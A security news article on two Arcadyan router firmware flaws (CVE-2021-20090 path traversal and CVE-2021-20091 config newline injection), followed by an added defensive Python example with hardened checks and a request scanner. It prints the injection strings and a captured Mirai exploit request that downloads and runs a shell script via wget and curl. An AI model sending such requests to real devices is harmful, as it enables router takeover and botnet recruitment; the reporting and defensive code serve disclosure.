Vulnerability in home routers affecting 17 manufacturers

A large-scale attack has been recorded on the network against home routers whose firmware uses an HTTP server implementation from the company Arcadyan. To gain control of the devices, a combination of two vulnerabilities is used that allows remote execution of arbitrary code with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the brands of Beeline (the problem is confirmed in the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than 10 years and during this time has managed to migrate to at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to access any script of the web interface without authentication. The essence of the vulnerability is that in the web interface, some directories from which images, CSS files and JavaScript scripts are served are accessible without authentication. In this case, the directories for which unauthenticated access is allowed are checked using a prefix mask. Specifying "../" in a path to move to the parent directory is blocked by the firmware, but using the "..%2f" combination bypasses the check. Thus, it is possible to open protected pages by sending requests such as "http://192.168.1.1/images/..%2findex.htm".

The second vulnerability, CVE-2021-20091, allows an authenticated user to make changes to the device's system settings by sending specially formatted parameters to the apply_abstract.cgi script, which does not check for newline characters in the parameters. For example, when performing a ping operation, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field holding the IP address to be checked, and the script, when creating the settings file /tmp/etc/config/.glbcfg, will write the line "ARC_SYS_TelnetdEnable=1" into it, which enables the telnetd server and provides unrestricted shell command access with root privileges. Similarly, by setting the ARC_SYS_ parameter, arbitrary code can be executed on the system. The first vulnerability makes it possible to run the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".

To exploit the vulnerabilities, an attacker must be able to send a request to the network port on which the web interface is running. Judging by the dynamics of the attack's spread, many operators leave access to their devices open from the external network to simplify troubleshooting by the support service. If access to the interface is restricted to the internal network only, the attack can still be carried out from the external network using the "DNS rebinding" technique. The vulnerabilities are already being actively used to add routers to the Mirai botnet:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
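The two checks described above (the prefix mask on unauthenticated directories, and the unfiltered form field written into .glbcfg), modelled as an added example that is not code from the article or from Arcadyan's firmware. Each check is shown in its vulnerable form beside a hardened form, plus a small request-scanning helper for log review; the directory list, the helper and the sample requests are constructed for illustration, and the parameter names in them are assumptions.

```python
import posixpath
from urllib.parse import unquote, parse_qs

PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")   # assumed unauthenticated directories

def is_public_vulnerable(raw_path):
    """Flawed check: prefix mask on the raw (undecoded) path, blocking only a literal '../'."""
    return "../" not in raw_path and raw_path.startswith(PUBLIC_PREFIXES)

def is_public_hardened(raw_path):
    """Percent-decode and normalize first, then apply the prefix mask to the canonical path."""
    decoded = unquote(raw_path)
    if unquote(decoded) != decoded:          # double-encoded input: refuse rather than guess
        return False
    canonical = posixpath.normpath(decoded)  # '/images/../index.htm' becomes '/index.htm'
    return canonical.startswith("/") and any(
        (canonical + "/").startswith(p) for p in PUBLIC_PREFIXES)

def config_value_vulnerable(field):
    """Flawed: the decoded form field goes into the config file unchanged, newline included."""
    return unquote(field)

def config_value_hardened(field):
    """Reject CR/LF and other control characters so one field cannot become two config lines."""
    decoded = unquote(field)
    if any(ord(c) < 0x20 or c == "\x7f" for c in decoded):
        return None
    return decoded

def flag_request(path, body):
    """Detection view: reasons a logged request to the web interface resembles this attack."""
    reasons = []
    if is_public_vulnerable(path) and not is_public_hardened(path):
        reasons.append("encoded traversal out of a public directory")
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(config_value_hardened(v) is None for v in values):
            reasons.append("control character in parameter " + name)
    return reasons

if __name__ == "__main__":
    # Constructed request in the shape the article describes (parameter name assumed).
    sample_path = "/images/..%2fapply_abstract.cgi"
    sample_body = "action=start_ping&ARC_ping_ipaddress=192.168.1.2%0AARC_SYS_TelnetdEnable=1"
    for reason in flag_request(sample_path, sample_body):
        print("flagged:", reason)
```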

Source: opennet.ru
